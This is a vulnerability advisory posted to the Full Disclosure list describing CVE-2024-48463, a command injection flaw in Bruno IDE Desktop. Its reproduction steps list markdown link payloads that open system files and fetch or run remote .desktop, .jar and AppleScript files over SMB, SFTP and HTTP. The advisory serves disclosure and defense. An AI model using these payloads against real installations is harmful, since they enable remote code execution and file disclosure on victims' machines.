=====[ Tempest Security Intelligence - ADV-10/2024
]==========================

Bruno IDE Desktop prior to 1.29.0

Author: Rodolfo Tavares

Tempest Security Intelligence - Recife, Pernambuco - Brazil

=====[ Table of Contents ]==================================================

Overview
Detailed Description
Timeline of Disclosure
Thanks & Acknowledgements
References

=====[ Vulnerability Information
]===========================================

Class: Improper Neutralization of Input During Web Page Generation
('Command Injection') [CWE-78]
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H - 9.8

=====[ Overview ]===========================================================

System Affected: Bruno IDE Desktop
Software Version: All versions prior to 1.29.0
Impacts:
Vulnerability: A command injection vulnerability in the function
shell.openExternal of Bruno IDE Desktop prior to version 1.29.0 allows
attackers to execute arbitrary commands by supplying a crafted URL, leading
to potential remote code execution.

=====[ Detailed Description ]===============================================

Command Injection [PoC - Reproduction Steps]:

1. Launch Bruno IDE Desktop on any supported operating system.
2. Create a Collection and navigate to the Docs tab
3. Insert the following markdown payloads depending on the target OS:

Linux:

[passwd](/etc/passwd)

[smb](smb://localhost/public/x.desktop) - Malicious .desktop file

[sftp](sftp://user@localhost/home/user/s.desktop) - Malicious .desktop file

POC Video: https://www.youtube.com/watch?v=SPCGVLEfVgw

Windows:

[Calc](C:/Windows/system32/calc.exe)

If Java is installed, directly execute a malicious .jar file:

[exploit](http://localhost/pwn.jar)

[exploit](C:/Users/user/Downloads/pwn.jar)

POC Video: https://www.youtube.com/watch?v=KVwKQkXA-vI

macOS:

[calc](/System/Applications/Calculator.app) - Opens Calculator on macOS.

[calcFile](System/Applications/Calculator.app) - Another method to trigger
Calculator.

[exploit1](smb://10.211.55.6/public/hello.scptd) - Connects to a remote SMB
share and executes a script.

[exploit2](/Volumes/hello.scptd/Contents/Resources/Scripts/main.scpt) -
Executes a script from a mounted volume.

[file](///etc/hosts) - Reads the system’s /etc/hosts file.

[facetime1](facetime:+123456789) - Attempts to launch FaceTime with a
specific phone number.

[facetime2](facetime:some...@example.com) - Triggers FaceTime using an
email address.

[tel](tel:+123456789) - Initiates a phone call via the tel: protocol.

[mail](x-apple-reminder://) - Opens the Apple Reminders app via a custom
protocol.

[calendar](calendar://) - Attempts to open a calendar application.

POC Video: https://www.youtube.com/watch?v=S0W93tbKaFY

4. Upon execution, the crafted URL results in arbitrary command execution
in the victim's environment.

=====[ Timeline of Disclosure
]==============================================

14/Set/2024 - Responsible disclosure was initiated with the vendor.
16/Set/2024 - Vendor acknowledged the vulnerability.
20/Nov/2024 - The vendor released a patch (version 1.29.1) addressing the
issue.
24/Out/2024 - CVE-2024-48463 was assigned and reserved.

=====[ Thanks & Acknowledgements ]==========================================

Tempest Security Intelligence [1]
Rodolfo Tavares - Vulnerability Discover
Filipe Xavier - Special Thanks
Henrique Arcoverde - Special Thanks

=====[ References ]=========================================================

[1] https://www.tempest.com.br
[2] https://cwe.mitre.org/data/definitions/78.html
[3] https://gist.github.com/opcod3r/ab69f36d52367df7ffac32a597dff31c
[4] https://nvd.nist.gov/vuln/detail/CVE-2024-48463

=====[ EOF ]===============================================================
--

-- 

*Esta mensagem é para uso exclusivo de seu destinatário e pode conter 
informações privilegiadas e confidenciais. Todas as informações aqui 
contidas devem ser tratadas como confidenciais e não devem ser divulgadas a 
terceiros sem o prévio consentimento por escrito da Tempest. Se você não é 
o destinatário não deve distribuir, copiar ou arquivar a mensagem. Neste 
caso, por favor, notifique o remetente da mesma e destrua imediatamente a 
mensagem.*

*
*
*This message is intended solely for the use of its 
addressee and may contain privileged or confidential information. All 
information contained herein shall be treated as confidential and shall not 
be disclosed to any third party without Tempest’s prior written approval. 
If you are not the addressee you should not distribute, copy or file this 
message. In this case, please notify the sender and destroy its contents 
immediately.**
*
*
*
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Reply via email to